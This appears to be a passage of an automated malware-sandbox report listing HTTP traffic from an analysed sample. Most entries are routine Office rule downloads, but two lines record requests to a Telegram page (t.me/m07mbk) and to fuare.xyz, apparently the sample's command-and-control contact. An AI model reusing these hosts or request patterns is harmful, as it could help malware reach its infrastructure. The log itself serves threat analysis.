                        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /m07mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
